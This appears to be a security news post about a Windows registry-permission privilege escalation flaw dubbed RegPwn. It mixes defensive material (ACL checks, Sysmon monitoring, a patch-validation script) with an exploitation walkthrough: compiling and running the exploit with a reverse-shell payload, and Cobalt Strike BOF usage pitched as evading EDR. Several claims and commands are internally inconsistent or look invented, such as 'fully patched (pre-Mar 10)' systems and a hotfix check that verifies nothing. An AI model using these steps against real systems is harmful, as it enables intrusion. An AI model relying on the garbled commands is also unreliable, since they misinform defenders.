Listen to this Post

Introduction:
A newly disclosed Windows Local Privilege Escalation (LPE) vulnerability, designated CVE-2026-24291 and dubbed “RegPwn,” leverages improper registry permission assignments to allow unprivileged attackers to gain SYSTEM-level access. Exploiting weak discretionary access control lists (DACLs) on specific registry hives, this flaw enables token manipulation and arbitrary code execution with highest integrity. Patched on March 10, 2026, RegPwn affects all modern Windows versions, including Windows 11 25H2/24H2, Windows 10 21H2, and Windows Server 2016/2019/2022.
Learning Objectives:
- Understand the root cause of CVE-2026-24291 and how registry ACL misconfigurations enable LPE.
- Execute step-by-step exploitation techniques using public RegPwn exploits, including BOF integration for red team operations.
- Apply detection, mitigation, and patch verification commands across Windows environments to harden against similar attacks.
You Should Know:
1. Understanding the Vulnerability: Registry Permission Flaw
The RegPwn vulnerability stems from overly permissive ACLs on certain critical registry keys (e.g., `HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options` or specific service configuration keys). A standard user can modify these keys, leading to hijacking of privileged processes via mechanisms like `IFEO` debuggers or `ServiceDLL` redirection. The exploit publicly released by mdsecactivebreach (https://github.com/mdsecactivebreach/RegPwn) demonstrates how to write a malicious value that a SYSTEM-trusted process reads, triggering arbitrary code elevation.
Step‑by‑step guide to verify registry permissions (Windows):
Check permissions on a target key (run as non-admin) Get-Acl -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" | Format-List Using accesschk from Sysinternals (more granular) accesschk.exe -k "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" Look for "BUILTIN\Users" with "KEY_SET_VALUE" or "WRITE_DAC" rights
If a non-admin user has write access, the system is vulnerable. The patched version (post-Mar 10, 2026) revokes these write privileges.
2. Exploitation Walkthrough: Leveraging RegPwn for LPE
The RegPwn exploit typically targets a registry key used by a scheduled task or Windows service that runs as SYSTEM and reads a specific value. The attacker modifies that value to point to a malicious executable or DLL. When the privileged process triggers (e.g., via `SchTasks.exe` or system event), it executes the attacker’s payload with SYSTEM rights.
Step‑by‑step guide using the public RegPwn exploit (educational purposes only):
Clone the repository (Linux or Windows with Git) git clone https://github.com/mdsecactivebreach/RegPwn.git cd RegPwn Compile the exploit (requires Visual Studio or mingw) On Windows with VS Developer Command cl /EHsc RegPwn.cpp /Fe:RegPwn.exe On Linux cross-compiling for Windows: x86_64-w64-mingw32-gcc RegPwn.cpp -o RegPwn.exe -ladvapi32 Execute the exploit (non-admin PowerShell) .\RegPwn.exe --target-key "HKLM\SOFTWARE\VulnKey" --payload "C:\temp\reverse_shell.exe" If successful, the payload runs as SYSTEM when the vulnerable service restarts
The BOF (Beacon Object File) version (https://lnkd.in/dzd6m8CZ) allows Cobalt Strike operators to execute the exploit in-memory, evading traditional file-based detection.
3. Detection and Mitigation: Commands and Configurations
Detecting RegPwn exploitation requires monitoring registry writes from low-integrity processes to high-value keys. Use Sysmon event ID 13 (RegistryValueSet) and filter for `TargetObject` containing vulnerable paths. Mitigation involves applying the March 2026 security patches or manually tightening registry ACLs.
Step‑by‑step detection and hardening:
Query installed patches to verify CVE-2026-24291 is applied
Get-HotFix | Where-Object {$_.HotFixID -like "KB"} | Select-Object HotFixID,InstalledOn
Manual hardening (if patch unavailable) – remove Users write permission on critical keys
$key = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"
$acl = Get-Acl $key
$rule = New-Object System.Security.AccessControl.RegistryAccessRule("BUILTIN\Users","SetValue","Deny")
$acl.AddAccessRule($rule)
Set-Acl -Path $key -AclObject $acl
Monitor registry changes with Sysmon config (install Sysmon first)
sysmon -accepteula -i sysmon-config.xml XML should include rule for EventID 13 on IFEO path
4. Patch Verification and Hardening Steps
Microsoft released an out-of-band patch on March 10, 2026. To verify patching status, check registry permission changes – the update removes `NT AUTHORITY\INTERACTIVE` and `BUILTIN\Users` write access from vulnerable keys. For systems that cannot be patched (e.g., legacy servers), implement application whitelisting and restrict token duplication rights.
Step‑by‑step patch validation script (PowerShell):
Save as Test-RegPwnPatch.ps1
$vulnKeys = @(
"HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options",
"HKLM:\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient"
)
foreach ($key in $vulnKeys) {
$acl = Get-Acl $key -ErrorAction SilentlyContinue
$access = $acl.Access | Where-Object {$<em>.IdentityReference -eq "BUILTIN\Users" -and $</em>.RegistryRights -match "SetValue"}
if ($access) {
Write-Host "VULNERABLE: $key still has Users write access" -ForegroundColor Red
} else {
Write-Host "PATCHED: $key is secure" -ForegroundColor Green
}
}
5. Red Team Use Cases and BOF Integration
For penetration testers, RegPwn offers a reliable LPE vector on fully patched (pre-Mar 10) or misconfigured systems. The BOF integration (https://lnkd.in/dzd6m8CZ) allows in-memory execution from Cobalt Strike or BruteRatel, bypassing EDR hooks on `RegCreateKeyEx` and RegSetValueEx. Operators can combine RegPwn with `SeImpersonatePrivilege` enumeration to achieve full domain admin in Active Directory environments.
Step‑by‑step BOF usage in Cobalt Strike (aggressor script snippet):
// Load BOF in beacon beacon> bofpacker /path/to/RegPwn.bof beacon> regpwn --key "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\Monitoring" --dll "C:\Windows\Tasks\evil.dll" // Expected output: "Registry key modified. Triggering LPE via system crash or service restart."
Always obtain explicit authorization before testing.
6. Post-Exploitation Impact Analysis
Once SYSTEM access is achieved, attackers can dump LSASS memory for credentials, disable security software, move laterally via SMB or WinRM, and establish persistence. In domain-joined environments, LPE on a domain controller or critical server leads to full Active Directory compromise. Defenders must assume breach and hunt for indicators such as unexpected `WerFault.exe` child processes (due to SilentProcessExit abuse) or new registry keys under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit.
What Undercode Say:
- Key Takeaway 1: Registry ACL misconfigurations remain a persistent Windows attack surface – always audit `HKLM` keys for writable DACLs by non-admins using tools like `accesschk` or
Get-Acl. - Key Takeaway 2: Red team adoption of BOF-based LPEs (like RegPwn) signals a shift toward memory-only exploitation, demanding behavioral EDR rules instead of signature-based detection.
- The March 10, 2026 patch is critical but not automatically applied – organizations must verify installation via the provided PowerShell script. For unpatched systems, consider enabling `Process Mitigation Policies` (e.g., DisallowWin32kSystemCalls) and using Windows Defender Credential Guard to limit token theft. The vulnerability’s disclosure highlights the need for routine registry permission reviews as part of CIS benchmark compliance.
Prediction:
CVE-2026-24291 will likely be weaponized within 30 days by ransomware gangs as an initial access-to-elevation tool, especially on unpatched Windows Servers 2016/2019 still used in critical infrastructure. Expect threat actors to combine RegPwn with PrintNightmare-style remote code execution for full domain takeover. Microsoft may respond by introducing a new “Protected Registry” feature in Windows 12, but until then, defenders must prioritize registry auditing and deploy Microsoft’s “Attack Surface Reduction” rules targeting `reg.exe` writes to privileged keys. The vulnerability also reignites debate about deprecating legacy registry-based auto-start extensibility points (ASEPs) in favor of Group Policy-controlled configurations.
▶️ Related Video (82% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Omar Aljabr – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


